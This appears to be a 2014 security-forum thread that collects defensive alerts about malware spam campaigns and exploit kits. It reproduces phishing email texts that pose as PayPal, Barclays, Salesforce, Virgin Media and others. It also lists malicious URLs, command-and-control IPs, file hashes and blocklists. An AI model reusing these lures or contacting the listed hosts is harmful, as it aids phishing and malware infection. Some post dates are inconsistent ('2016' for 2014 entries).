Recently, we saw that this campaign was showing up in ads via YouTube as well. This was a worrying development: not only were malicious ads showing up on YouTube, they were on videos with more than 11 million views – in particular, a music video uploaded by a high-profile record label. The ads we’ve observed do not -directly- lead to malicious sites from YouTube. Instead, the traffic passes through two advertising sites, suggesting that the cybercriminals behind this campaign bought their traffic from legitimate ad providers. In order to make their activity look legitimate, the attackers used the -modified- DNS information of a Polish government site. The attackers did not compromise the actual site; instead they were able to change the DNS information by adding subdomains that lead to their own servers. (How they were able to do this is unclear.) The traffic passes through two -redirection- servers (located in the Netherlands) before ending up at the malicious server, located in the United States. The exploit kit used in this attack was the Sweet Orange exploit kit. Sweet Orange is known for using four vulnerabilities, namely:
CVE-2013-2460 – Java
CVE-2013-2551 – Internet Explorer
CVE-2014-0515 - Flash
CVE-2014-0322 – Internet Explorer
Based on our analyses of the campaign, we were able to identify that this version of Sweet Orange uses vulnerabilities in Internet Explorer. The URL of the actual payload constantly changes, but they all use subdomains on the same Polish site mentioned earlier. However, the behavior of these payloads are identical. The final payloads of this attack are variants of the KOVTER malware family, which are detected as TROJ_KOVTER.SM. This particular family is known for its use in various ransomware attacks, although they lack the encryption of more sophisticated attacks like Cryptolocker. The websites that TROJ_KOVTER.SM accesses in order to display the fake warning messages are no longer accessible. Users who keep their systems up to date will not affected by this attack, as Microsoft released a patch for this particular vulnerability in May 2013. We recommend that read and apply the software security advisories by vendors like Microsoft, Java, and Adobe, as old vulnerabilities are still being exploited by attackers. Applying the necessary patches is essential part of keeping systems secure..."
:mad: :fear::fear:
AplusWebMaster
2014-10-15, 14:58
FYI...
Fake delivery SPAM - word doc malware ...
- http://myonlinesecurity.co.uk/inform-package-way-fake-word-doc-malware/
15 Oct 2014 - "An email pretending that you have purchased an unspecified item from an unspecified store saying 'This is to inform you that the package is on its way to you' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Thank you for buying at our store!
Date ordered: October 14 2014
This is to inform you that the package is on its way to you. We also included delivery file to your shipping address.
Payment Nr : 7795816097 Order total : 527.54 USD Delivery date : 10/ 22th 2014.
Please review the attached document.
15 October 2014: 0048898757_order _doc.zip: Extracts to: 0048898757_order _doc.exe
Current Virus total detections: 7/54* . This 'This is to inform you that the package is on its way to you' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8c41235f43356c845b193b04efa60bbecb1787028e8ad6e25eb4c01ee2d94804/analysis/1413361301/
___
Fake 'Shipping Info' SPAM
- http://blog.dynamoo.com/2014/10/shipping-information-for-spam-uses.html
15 Oct 2014 - "This fake shipping spam contains malware.. although it appears that it may be buggy and might not install properly.
Screenshot: https://3.bp.blogspot.com/-l3nlpqmPSoo/VD6K3ZdvApI/AAAAAAAAF1E/a_k4VUkXNX0/s1600/shipping-info.png
The link in the email goes to https ://www.google .com/url?q=https%3A%2F%2Fcopy.com%2FEl9fd4VfLkfN%2FTrackShipment_0351.PDF.scr%3Fdownload%3D1&sa=D&sntz=1&usg=AFQjCNE0-3UrX7jNPzSGYodsQVzmBhrwMA which bounces through Google and then downloads a malicious executable TrackShipment_0351.PDF.scr which has a VirusTotal detection rate of 4/54*... What I think is meant to happen is that a malicious script that has been disguising itself as a GIF file which then renames a component Gl.png to Gl.exe and then attempts to execute it... This executable has a VirusTotal detection rate of 2/53**. It bombs out of automated analysis tools... possibly because it is being executed with the wrong parameters. It also opens a seemingly legitimate PDF file (VT 0/54***) which is designed to look like a Commercial Invoice, presumably to mask the fact that it is doing something malicious in the background.
> https://4.bp.blogspot.com/-86SXLSZk37U/VD6PBROpsAI/AAAAAAAAF1c/ZRCiUJev-KI/s1600/commerical-invoice.png
If you opened a file similar to this and you saw a PDF with a blank Commercial Invoice like the one pictured above, then you've probably been -infected- by the executable running in the background."
* https://www.virustotal.com/en-gb/file/e5f0ea546dcfb99803c9a02df82f587fa09b16c87337e868d8eabf360178ba59/analysis/1413383394/
** https://www.virustotal.com/en-gb/file/f9cca52c9d840f3cfc8997e77a42ebc7640ea71f7729fa1782d8596a05ed963b/analysis/1413384221/
*** https://www.virustotal.com/en-gb/file/409e472b667ae747942e10d4dc691796c3b2eb00a0e407146e69b2f8205de40c/analysis/1413384174/
___
Fake Paypal SPAM – PDF malware
- http://myonlinesecurity.co.uk/paypal-transaction-complete-fake-pdf-malware/
15 Oct 2014 - "'Transaction not complete' pretending to come from PayPal is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Unable to complete your most recent Transaction.
Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please see attached payment receipt .
15 October 2014: Transaction25765048.zip: Extracts to: Transaction_21633987.scr
Current Virus total detections: 7/54* . This 'Transaction not complete' pretending to come from PayPal is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4b742cf87e49bc1cca0ce474ac34dd04ae00e28783aeafcfcd5a45a369be6543/analysis/1413387437/
:fear: :mad:
AplusWebMaster
2014-10-16, 23:23
FYI...
Fake Bank SPAM
- http://blog.dynamoo.com/2014/10/barclays-bank-transaction-not-complete.html
16 Oct 2016 - "This fake Barclays spam leads to malware.
From: Barclays Bank [Barclays@email .barclays .co.uk]
Date: 16 October 2014 12:48
Subject: Transaction not complete
Unable to complete your most recent Transaction.
Currently your transaction has a pending status. If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt below...
Clicking on the link downloads a file document23_pdf.zip containing a malicious executable document23_pdf.scr which has a VirusTotal detection rate of 4/54*. The Malwr report shows that it reaches out to the following URLs:
http ://188.165.214.6 :12302/1610uk1/HOME/0/51-SP3/0/
http ://188.165.214.6 :12302/1610uk1/HOME/1/0/0/
http ://188.165.214.6 :12302/1610uk1/HOME/41/5/1/
http ://jwoffroad .co.uk/img/t/1610uk1.osa
In my opinion 188.165.214.6 (OVH, France) is an excellent candidate to -block- or monitor. It also drops two executables, bxqyy.exe (VT 5/54** ...) and ldplh.exe (VT 1/51*** ...)."
* https://www.virustotal.com/en/file/626687777469a5a1cca0303fd565ee230fb5f5799a6d8cbaec097a5f7266eb28/analysis/1413462043/
... Behavioural information
DNS requests
jwoffroad .co.uk (88.208.252.216)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
88.208.252.216: https://www.virustotal.com/en/ip-address/88.208.252.216/information/
** https://www.virustotal.com/en/file/8d5d66e390e2293bec87422dfa2f4683b423e8084a07de207a75d2831f88d9a8/analysis/1413462507/
*** https://www.virustotal.com/en/file/752afd97f0473ec909797c02ac49b3f33e94ca06d6678af517d6d2fe98e00341/analysis/1413462517/
___
Many .su and .ru domains leading to malware
- http://blog.dynamoo.com/2014/10/a-bunch-of-su-and-ru-domains-leading-to.html
16 Oct 2016 - "These sites lead to some sort of malware. The presence of .SU domains hosted on what looks like a botnet is probably all you need to know.... recommend watching out for these..."
(Long list at the dynamoo URL above.)
- https://www.abuse.ch/?p=3581
- http://blog.dynamoo.com/2013/03/zbot-sites-to-block.html
"The obsolete .su (Soviet Union) domain is usually a tell-tale sign..."
___
Fake Invoice SPAM
- http://myonlinesecurity.co.uk/re-invoice-4023390-fake-pdf-malware/
16 Oct 2016 - "'RE: Invoice #4023390' pretending to come from Sage Accounting < Alfonso.Williamson@ sage-mail .com >is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please see attached copy of the original invoice.
16 October 2014: Invoice_4017618.zip: Extracts to: Invoice_4017618.exe
Current Virus total detections: 5/54* . This RE: Invoice #4023390 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9645b9120975b47e440f60c182e4701e14c9f653a55bb0b4bec82bb71fe1c2d/analysis/1413490281/
... Behavioural information
DNS requests
lewis-teck .co.uk (5.77.44.47)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
5.77.44.47: https://www.virustotal.com/en/ip-address/5.77.44.47/information/
:fear::fear: :mad:
AplusWebMaster
2014-10-17, 13:50
FYI...
Fake Sage Invoice SPAM - malware
- http://blog.dynamoo.com/2014/10/sage-outdated-invoice-spam-spreads.html
17 Oct 2014 - "This -fake- Sage email spreads malware using a service called Cubby, whatever that is.
Screenshot: https://2.bp.blogspot.com/-UFvbcQMZeqc/VEDn4-OJqZI/AAAAAAAAF2I/M7n6GtqZVRM/s1600/sage3.png
Despite appearances, the link in the email (in this case) actually goes to https ://www.cubbyusercontent .com/pl/Invoice_032414.zip/_8deb77d3530f43be8a3166544b8fee9d and it downloads a file Invoice_032414.zip. This in turn contains a malicious executable Invoice_032414.exe which has a VirusTotal detection rate of 3/53*. The Malwr report shows HTTP conversations with the following URLs:
http :// 188.165.214.6 :15600/1710uk3/HOME/0/51-SP3/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/1/0/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/41/5/1/
http :// tonysenior .co.uk/images/IR/1710uk3.osa
188.165.214.6 is (not surprisingly) allocated to OVH France. In turn, it drops an executable bcwyw.exe (VT 6/54**...) which communicates with 66.102.253.25 (a China Telecom address located in the US in a Rackspace IP range) and also moxbk.exe (VT 1/52***...).
Recommended blocklist:
188.165.214.6
66.102.253.25
tonysenior .co.uk "
* https://www.virustotal.com/en-gb/file/a772bdadac8a2f4819519e3ffb10a4aca141d64d78660e78e6f42a6ceb509183/analysis/1413539374/
... Behavioural information
DNS requests
tonysenior .co.uk (66.7.214.212)
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
66.7.214.212: https://www.virustotal.com/en-gb/ip-address/66.7.214.212/information/
** https://www.virustotal.com/en-gb/file/30dc00ee245dc553d569b94cc13f1acfed70740c7c10405d164694bc7d065f9d/analysis/1413540238/
*** https://www.virustotal.com/en-gb/file/3a281070d196e0906851550c51c319843c0c99198a2f7b2e393e433aa0cb0b68/analysis/1413540261/
___
Fake 'SalesForce Security Update' SPAM – malware
- http://myonlinesecurity.co.uk/october-17-2014-salesforce-security-update-malware/
17 Oct 2014 - "'October 17, 2014 SalesForce Security Update' pretending to come from SalesForce .com <no-reply@ salesforce .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The malware inside this zip file is at this time -undetected- by any antivirus on Virus Total* and to make it much worse the Virus Total engine tries to tell you that the file is Probably harmless! There are strong indicators suggesting that this file is safe to use. This is an even bigger problem than it normally would be because of the recent Poodle bug and servers consequently changing their encryption routines to remove the vulnerable SSLv3 version from being used. It is eminently believable that you might need to change the SSL certificate on your browser to comply with the new behaviour if you are not a security or network IT specialist. This is obviously -wrong- and this type of malware that disguises itself as a legitimate file and can apparently conceal the malicious functions from an antivirus scan and make it believe it is innocent is very worrying. The MALWR analysis doesn’t show -anything- wrong and doesn’t show any network connections or other files downloaded. Anubis also comes up with a -nothing- on this one... a couple of manual analysis done by Virus total** users who find it -is- malicious... drops this file which -is- detected... Our friends at TechHelpList(1) have done an analysis on this one which clearly shows its bad behaviour and what it connects to and downloads...
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/
** https://www.virustotal.com/en/file/93691ef6e834951225ad024a6b662e857a47c2f5156e3def9f38ae964143c241/analysis/
1) https://techhelplist.com/index.php/spam-list/664-date-salesforce-security-update-virus
The email looks like:
Dear client,
You are receiving this notification because your Salesforce SSL certificate has expired.
In order to continue using Salesforce.com, you are required to update your digital certificate.
Download the attached certificate. Update will be automatically installed by double click.
According to our Terms and Conditions, failing to renew the SSL certificate will result in account suspension or cancelation... Thank you for using Salesforce .com
17 October 2014: cert_update.zip: Extracts to: cert_update.scr
Current Virus total detections: 0/52* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an icon of a white & red circular arrow instead of the .scr ( executable) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/
___
Fake eFax SPAM
- http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html
17 Oct 2014 - "This fake eFax spam leads to malware:
From: eFax [message@ inbound .claranet .co.uk]
Date: 17 October 2014 11:36
Subject: eFax message from "02086160204" - 1 page(s), Caller-ID: 208-616-0204
Fax Message [Caller-ID: 208-616-0204]
You have received a 1 page fax at 2014-10-17 09:34:48 GMT.
* The reference number for this fax is lon2_did11-4056638710-9363579926-02.
Please visit... to view this message in full...
The link in the email goes to some random hacked WordPress site or other with a URL with a format similar to the following:
http ://tadarok .com/wp-content/themes/deadline/mess.html
http ://107.170.219.47 /wp-content/themes/inove/mess.html
http ://dollfacebeauty .com.au/wp-content/themes/landscape/mess.html
Then (if your user agent and referrer are correct) it goes to a -fake- eFax page at http ://206.253.165.76 :8080/ord/ef.html which does look pretty convincing. (Incidentally if the UA or referrer are not right you seem to get dumped on a pills site of naturaldietpills4u .com).
Screenshot: https://1.bp.blogspot.com/-IzglVG8I_co/VED-m9ehHQI/AAAAAAAAF2Y/HyA5Tk30D9E/s1600/efax2.png
The download link goes to http ://206.253.165.76: 8080/ord/FAX_20141008_1412786088_26.zip which is a ZIP file containing a malicious executable FAX_20141008_1412786088_26.exe which has a VirusTotal detection rate of 4/54*... Recommended blocklist:
107.170.19.156
212.59.117.207
206.253.165.76 "
* https://www.virustotal.com/en-gb/file/b2b9486a36dff94a3222c16d309c073da61a98dfa1c1d303b5d3740f54842ff6/analysis/1413545028/
___
Fake Virgin Media SPAM - phish/malware
- http://myonlinesecurity.co.uk/help-advice-virgin-media-malware/
17 Oct 2014 - "An email with a subject of 'Help & Advice – Virgin Media' pretending to come from Virgin Media is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Virgin Media Automated Billing Reminder
Date 17th October 2014
This e-mail has been sent you by Virgin Media to inform you that we were unable to process your most recent payment of bill. This might be due to one of the following reasons:
A recent change in your personal information such as Name or address.
Your Credit or Debit card has expired.
Insufficient funds in your account.
Cancellation of Direct Debit agreement.
Your Card issuer did not authorize this transaction.
To avoid Service interruption you will need to update your billing profile, failure to update your profile may lead in service cancellation and termination.
Please click on the link below to login to e-Billing. You will need to login using your primary E-mail address...
Be very careful with email attachments. -All- of these emails use Social engineering tricks to persuade you to open the attachments or follow the links... -Never- just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most ( if not all) malicious files that are attached to emails will have a -faked- extension..."
___
More Free Facebook Hacks ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/more-free-facebook-hacking-sites-surface-online/
Oct 16, 2014 - "... more sites claiming to offer hacking services that target Facebook users. The sites are:
fbwand(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/fbwand.png
hackfbaccountlive(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackfbaccountlive.png
One starts off by entering the profile URL of the Facebook user account (the target) he/she wants to hack. The site then makes him/her believe that an -actual- hacking is ongoing, firstly, by retrieving and displaying specific information from Facebook’s Graph Search*, such as user ID, user name, and a large version of the profile photo, to the page; and, secondly, by providing the attacker the progress of completion of each hacking attempt. Below are screenshots of these attempts, beginning with purportedly fetching the target’s email ID:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/05-verify.png?w=564
After a successful “hack”, the site informs the attacker that they have created an account for them on the website, complete with a generated user name and password, and that they have to log in to their accounts to retrieve the target’s Facebook account details. Just when it seems too easy, the attacker sees this upon logging in:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackers-panel.png
He/She is instructed to unlock the details in two ways. One is to share a generated referral link to their social networks (particularly Facebook and/or Twitter) in order to get 15 visitors to click it... Although it’s true that no website is perfectly secure one must not attempt to hack into them nor break into someone else’s online profile. These are illegal acts. Sites marketing themselves as free, user-friendly hacking-as-a-service (HaaS) tool, such as those I mentioned here, generally takes advantage of user distrust against someone and profits on it, promising big but deliver nothing in the end. Avoid them at all cost."
* https://www.facebook.com/about/graphsearch
___
Ebola Phishing Scams and Malware Campaigns
- https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014 - "... protect against email scams and cyber campaigns using the Ebola virus disease (EVD) as a theme. Phishing emails may contain links that direct users to websites which collect personal information such as login credentials, or contain malicious attachments that can infect a system. Users are encouraged to use caution when encountering these types of email messages and take the following preventative measures to protect themselves:
- Do not follow unsolicited web links or attachments in email messages.
- Maintain up-to-date antivirus software..."
___
CUTWAIL Spambot Leads to UPATRE-DYRE Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/cutwail-spambot-leads-to-upatre-dyre-infection/
Oct 16, 2014 - "... new spam attack disguised as invoice message notifications was recently seen spreading the UPATRE malware, that ultimately downloads its final payload- a BANKER malware related to the DYREZA/DYRE banking malware... In early October we observed a surge of spammed messages sent by the botnet CUTWAIL/PUSHDO, totaling to more than 18,000 messages seen in a single day. CUTWAIL/PUSHDO has been in the wild since as early as 2007 and was considered one of the biggest spam botnets in 2009. We spotted some spammed emails that disguise itself as invoice message notifications or “new alert messages” from various companies and institutions.
Screenshot of spammed messages related to CUTWAIL/PUSHDO:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Cutwail_samples.jpg
Top spam sending countries for this CUTWAIL spam run:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Top-spam-sending-countries-01.jpg
... Based on our 1H 2014 spam report, UPATRE is the top malware seen in spam emails. With its continuously developing techniques, UPATRE remains as one of most prevalent malware today. Examples of newer UPATRE techniques are its ability to use password-protected archives as attachments, and abuse of online file storage platform, Dropbox in order to bypass spam filters.
Top malware distributed via spam as of August 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/CUTWAIL-Spambot_fig1.jpg
... in this attack, this UPATRE variant, TROJ_UPATRE.YYJS downloads the final payload, TSPY_BANKER.COR, which is related to DYREZA/DYRE banking malware. The DYREZA malware is a banking malware with the following capabilities:
- Performs man-in-the-middle attacks via browser injections
- Steals banking credentials and monitors online banking session/transactions
- Steals browser snapshots and other information
Based on our analysis, TSPY_BANKER.COR connects to several websites to receive and send information. Given this series of malware infections, affected systems also run the risk of having their sensitive data stolen (such as banking credentials data) in order to be used for other future attacks. Apart from the risk of stolen information, this spam attack also highlights the risk of traditional threats (like spam) being used as a vehicle for -other- advanced malware to infect systems. This may consequently even lead to infiltrating an entire enterprise network... We highly recommend that users take extra caution when dealing with emails that contain attachments and URLs in the email body. Ensure that the domains are legitimate and take note of the company name indicated in the email. Another tip is to steer clear of suspicious-looking archive files attached to emails, such as those ending in .ZIP, or .RAR. UPATRE is also known to use email templates through DocuSign with emails that come in the form of -bank- notifications, -court- notices, and -receipts- ..."
___
WhatsApp Spam
- http://threattrack.tumblr.com/post/100162392338/whatsapp-spam
Oct 16, 2014 - "Subjects Seen:
Voice Message Notification
Typical e-mail details:
You have a new voicemail!
Details:
Time of Call: Oct-13 2014 06:02:04
Lenth of Call: 07sec
Malicious URLs:
p30medical .com/dirs.php?rec=LLGIAmEUFLipINmiPz4S0g
Malicious File Name and MD5:
VoiceMail.zip (713A7D2A9930B786FE31A603CD06B196)
VoiceMail.exe (2B7E9FC5A65FE6927A84A35B5FEAC062)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/5fe4acaac97621cafb4688b950049ac6/tumblr_inline_ndjlwzSYyI1r6pupn.png
Tagged: Whatsapp, Kuluoz
:fear::fear: :mad:
AplusWebMaster
2014-10-19, 07:00
FYI...
Evil network: 5.135.230.176/28 - OVH
- http://blog.dynamoo.com/2014/10/evil-network-513523017628-ovh-eldar.html
18 Oct 2014 - "These domains are currently hosted or have recently been hosted on 5.135.230.176/28 and all appear to be malicious in some way, in particular some of them have been hosting the Angler EK* (hat tip)... 5.135.230.176/28 is an OVH IP range allocated to what might be a ficticious customer:
organisation: ORG-EM25-RIPE
org-name: eldar mahmudov
org-type: OTHER
address: ishveran 9
address: 75003 paris
address: FR
e-mail: mahmudik@ hotmail .com
abuse-mailbox: mahmudik@ hotmail .com
phone: +33.919388845
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ ovh .net 20140621
source: RIPE
There appears to be nothing legitimate at all in this IP address range, I strongly recommend that you -block- traffic going to it."
* http://malware-traffic-analysis.net/2014/10/06/index.html
Diagnostic page for AS16276 (OVH)
- https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 4009 site(s)... resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-10-18, and the last time suspicious content was found was on 2014-10-18... we found 543 site(s) on this network... that appeared to function as intermediaries for the infection of 4498 other site(s)... We found 1150 site(s)... that infected 2883 other site(s)..."
___
malwr
- https://malwr.com/
Oct. 19, 2014 - "Last Comments:
Malware.
222.236.47.53:8080 195.206.7.69:443 46.55.222.24:8080 162.144.60.252:8080 91.212.253.253:443 95.141.32.134:8080"
- https://malwr.com/about/ >> http://www.shadowserver.org/ *
- 222.236.47.53: https://www.virustotal.com/en/ip-address/222.236.47.53/information/
- 195.206.7.69: https://www.virustotal.com/en/ip-address/195.206.7.69/information/
- 46.55.222.24: https://www.virustotal.com/en/ip-address/46.55.222.24/information/
- 162.144.60.252: https://www.virustotal.com/en/ip-address/162.144.60.252/information/
- 91.212.253.253: https://www.virustotal.com/en/ip-address/91.212.253.253/information/
- 95.141.32.134: https://www.virustotal.com/en/ip-address/95.141.32.134/information/
Bot Count Graphs
* https://www.shadowserver.org/wiki/pmwiki.php/Stats/BotCountYearly#toc1
Page last modified on Sunday, 19 October 2014
___
- http://blog.dynamoo.com/2014/10/final-notification-malware-spam-uses.html
17 Oct 2014
... ShippingLable_HSDAPDF.scr
- https://www.virustotal.com/en/file/9ad980467347dffbb50493c93ca834c40dbfdec61fc1339004a107aef6633ed2/analysis/1413566277/
... Comments:
Full list of CnCs:
5.135.28.118: https://www.virustotal.com/en/ip-address/5.135.28.118/information/
185.20.226.41: https://www.virustotal.com/en/ip-address/185.20.226.41/information/
5.63.155.195: https://www.virustotal.com/en/ip-address/5.63.155.195/information/
___
RIG Exploit Kit Dropping CryptoWall 2.0
- http://www.threattracksecurity.com/it-blog/rig-exploit-kit-dropping-cryptowall-2-0/
Oct 17, 2014 - "... observed spammers exploiting vulnerable WordPress links to -redirect- users to servers hosting the RIG Exploit Kit, which takes advantage of any number of vulnerabilities in unpatched Silverlight, Flash, Java and other applications to drop CryptoWall 2.0... nasty updated version of CryptoWall, which has built up steam since the disruption of CryptoLocker. Once infected with CryptoWall 2.0, users’ files are encrypted and held for ransom. The spammers behind this latest campaign seem to be the same crew behind a recent wave of eFax spam reported over at Dynamoo’s Blog*... The campaign Dynamoo revealed is being hosted side-by-side on the same server as the RIG Exploit Kit: hxxp ://206.253.165.76 :8080. The exploit redirector is hxxp ://206.253.165.76 :8080/ord/rot.php. And the spam Dynamoo reported is hxxp ://206.253.165.76 :8080/ord/ef.html... The exploit redirector is hxxp :// 206.253.165.76 :8080/ord/rot.php... malicious link loads a RIG Exploit Kit landing page to exploit any of its targeted vulnerabilities to drop CryptoWall 2.0. The MD5 of the sample analyzed is 8cc0ccec8483dcb9cfeb88dbe0184402 ..."
* http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html
206.253.165.76: https://www.virustotal.com/en/ip-address/206.253.165.76/information/
:mad: :fear:
AplusWebMaster
2014-10-20, 14:41
FYI...
Fake 'unpaid invoice' SPAM - xls malware
- http://myonlinesecurity.co.uk/acorn-engineering-limited-trading-unpaid-invoice-court-action-fake-excel-xls-malware/
20 Oct 2014 - "An email pretending to be an unpaid invoice and threatening court action with a subject of 'Acorn Engineering Limited trading' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Acorn-Maintenance-Engineering-logo...
October 20, 2014
Head Office
Acorn Engineering Limited trading
as Acorn Maintenance
Acorn House
20 Wellcroft Road
Slough
Berkshire
SL1 4AQ
Tel: 01753 386 073
Fax: 01753 409 672
Dear ...
Reference: 48771955-A8
Court action will be the consequence of your ignoring this letter.
Despite our telephone calls on October 10 and our letters of September 25, 2014 and October 20, 2014, and your promise to pay, payment of your account has still not been received. If full payment is not received by October 22, 2014 court action will be taken against your company.
If you allow this to happen you will incur court costs and you may forfeit your company’s credit status because the name of your company will be recorded by the major credit reference agencies. This may deter others from supplying you.
You are also being charged debt recovery costs and statutory interest of 8% above the reference rate (fixed for the six month period within which date the invoices became overdue) pursuant to the late payment legislation.
To stop this from happening please pay in full now the overdue invoice which is also attached to this letter.
Yours truly,
signature-Mishenko.gif (626?272)
Nadine Cox,
Accountant
Acorn Engineering Limited
Enclosure (Attachment)
20 October 2014: Copy4313_B0.zip: Extracts to: Invoice_7380901925299.xls.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Excel xls file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/02b93640df6c19e6e77de029688e7dc2cdf6cf0a8a8f68ea0e1777d2ddd98097/analysis/1413800273/
___
Fake PDF invoice SPAM
- http://www.symantec.com/connect/blogs/pdf-invoices-may-cost-more-you-expect
Oct 20, 2014 - "... Over the past week, Symantec has observed a spam campaign involving suspicious emails that masquerade as unpaid invoices. However, these suspicious emails come with a nasty surprise attached in the form of a malicious .pdf file.
Malicious .pdf file attached to suspicious email:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Fig1_19.png
While these invoices may appear to be legitimate because the sender’s email address may be associated with a major company, the emails contain spelling errors in the subject line and the body of the email contains just one line of text. Most business emails contain a personal greeting to the recipient and the sender’s signature, but these emails have neither. These signs should serve as warnings to users that the email is not what it claims to be. The attached .pdf file has malicious shellcode hidden inside of it that will be executed when opened with a vulnerable version of Adobe Reader... attackers are trying to exploit the Adobe Acrobat and Reader Unspecified Remote Integer Overflow Vulnerability (CVE-2013-2729) by triggering the vulnerability while parsing the crafted Bitmap encoded image... The embedded shellcode acts as a downloader which downloads a malicious executable file (Infostealer.Dyranges) from a remote location. The downloaded malware attempts to install itself as a service called “google update service”... If successful, the malware is then able to steal confidential information entered into Web browsers by the user. Symantec recommends that users exercise caution when opening emails and attachments from unexpected or unknown senders. We also advise that PDF viewers and security software be kept up-to-date. Symantec detects the malicious .pdf file used in this campaign as Trojan.Pidief*."
* http://www.symantec.com/security_response/writeup.jsp?docid=2009-121708-1022-99&tabid=2
___
Fake 'LogMeIn Security Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/october-16-2014-logmein-security-update-fake-pdf-malware/
20 Oct 2014 - "An email that says it is an announcement that you need to install a new 'LogMeIn security certificate' which pretends to come from LogMeIn .com < auto-mailer@ logmein .com > with a subject of October 16, 2014 'LogMeIn Security Update' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/LogMeIn-security-update.png
20 October 2014: cert_client.zip: Extracts to: cert_1020.scr
Current Virus total detections: 1/52* . This October 16, 2014 'LogMeIn Security Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a legitimate file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/19d11eec77e1f1b6179005277d67a8640b5f5bf573dac486c7e1e6baea227c59/analysis/1413811609/
___
Fake 'my new photo ;)' SPAM - trojan variant
- http://blog.mxlab.eu/2014/10/20/latest-email-my-new-photo-contains-a-new-trojan-variant/
Oct 20, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “my new photo ;)”... sent from the spoofed email addresses and has the following short body:
my new photo ;)
The attached ZIP file has the name photo.zip, once extracted a folder photo is available with that contains the 57 kB large file photo.exe . The trojan is known as a variant of HEUR/QVM03.0.Malware.Gen or Win32:Malware-gen. At the time of writing, 2 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en-gb/file/83912dc14a7de0ae2dbc6f12f2a5dbb54e2d94861ec6214163eaa2031df1b9b5/analysis/1413812842/
___
Fake Invoice SPAM – word doc malware
- http://myonlinesecurity.co.uk/adobe-invoice-word-doc-malware/
20 Oct 2014 - "An email pretending to come from Adobe with the subject of 'Adobe Invoice' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has an attachment that looks like a proper word.doc but something has disinfected all copies on its travels. All copies that I have received have been -less- than 1kb in size and are empty files with a name only adb-102288-invoice.doc . They are almost certainly supposed to be the typical malformed word docs, that contain a macros script -virus- we have been seeing so much recently that will infect you if you open or even preview them when you have an out of date or vulnerable version of Microsoft word on your computer... The email looks like:
Adobe(R) logo
Dear Customer,
Thank you for signing up for Adobe Creative Cloud
Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service...
